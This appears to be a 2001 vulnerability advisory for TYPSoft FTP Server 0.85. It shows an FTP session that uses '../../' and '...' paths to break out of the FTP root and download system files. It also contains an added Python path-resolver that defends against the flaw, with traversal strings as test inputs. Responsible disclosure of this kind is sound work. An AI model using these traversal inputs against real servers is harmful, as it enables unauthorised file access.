----- Begin Hush Signed Message from [EMAIL PROTECTED] -----

Vulnerability in TYPSoft FTP Server



    Overview

TYPSoft FTP Server v0.85 is an FTP server available from
http://www.webmasterfree.com and http://typsoft.n3.net.  A vulnerability
exists which allows a remote attacker to break out of the FTP root using
relative paths (i.e. '...').



    Details

The following is an illustration of the problem:


% ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220 TYPSoft FTP Server 0.85 ready...
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog.
Password:
230 User jdog logged in.
ftp> pwd
257 "/C:/directory/directory/" is current directory.
ftp> get ../../autoexec.bat
200 Port command successful.
150 Opening data connection for ../../autoexec.bat.
226 Transfer complete.
ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec.
ftp> cd ..
501 CWD failed. No permission
ftp> cd ...
250 CWD command successful. "/C:/directory/directory/.../" is current directory.
ftp> pwd
257 "/C:/directory/directory/.../" is current directory.
ftp> get config.sys
200 Port command successful.
150 Opening data connection for config.sys.
226 Transfer complete.
ftp: 89 bytes received in 0.05Seconds 1.78Kbytes/sec.
ftp>
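
In the session above, 'cd ..' is refused, but 'get ../../autoexec.bat' and 'cd ...' are accepted. The following is an added example, not TYPSoft code and not part of the original advisory, of one resolver applied to the argument of every path-taking command. It assumes the server tracks a virtual path in which '/' is the FTP root; all names in it are hypothetical.

```python
# Added example, not TYPSoft code. All names here are hypothetical.

class FtpRootError(Exception):
    """A client-supplied path would leave the FTP root."""

def resolve_virtual(cwd, arg):
    """Resolve arg against the virtual cwd, where '/' is the FTP root.

    Returns the normalized virtual path or raises FtpRootError.
    """
    arg = arg.replace("\\", "/")          # Windows accepts both separators
    if ":" in arg or "\x00" in arg:
        raise FtpRootError("drive letter, stream or NUL in path")
    # An absolute argument restarts at the root, a relative one at cwd.
    stack = [] if arg.startswith("/") else [s for s in cwd.split("/") if s]
    for seg in arg.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not stack:
                raise FtpRootError("'..' above the FTP root")
            stack.pop()
        elif set(seg) == {"."} or seg != seg.rstrip(". "):
            # '...' is what the session above used after '..' was refused.
            # Names with trailing dots or spaces are refused too, rather
            # than guessing how the OS will normalize them (assumption).
            raise FtpRootError("ambiguous segment %r" % seg)
        else:
            stack.append(seg)
    return "/" + "/".join(stack)

def check(cwd, arg):
    """Return the resolved path, or the string 'DENY' for a refused one."""
    try:
        return resolve_virtual(cwd, arg)
    except FtpRootError:
        return "DENY"

# Constructed inputs modelled on the session: the same function guards
# both CWD and RETR arguments.
if __name__ == "__main__":
    for cwd, arg in [("/", "../../autoexec.bat"), ("/", ".."), ("/", "..."),
                     ("/pub", "../readme.txt"), ("/pub", "docs\\..\\..\\..\\x")]:
        print("%-6s %-22s -> %s" % (cwd, arg, check(cwd, arg)))
```

The real file name is built only from the returned virtual path joined to the configured root directory, never from the raw argument.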



    Solution

> Date: Sat, 24 Feb 2001 01:39:23 -0500
> Subject: Re: Vulnerability in TYPSoft FTP Server
> From: TYPSoft <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
>
> Hi
> I have tried to fix this problem.
> The test I have made seems to be OK.
> Thanks for the report
>
> Marc
> TYPSoft


    Unfortunately, I do not have the resources to verify this fix at
this time.  Thus, I urge users to proceed with caution.



    Vendor Status

TYPSoft was contacted via <[EMAIL PROTECTED]> on Wednesday, February
21, 2001.



    - Joe Testa  ( e-mail: [EMAIL PROTECTED] / AIM: LordSpankatron )




This message has been signed with a Hush Digital Signature.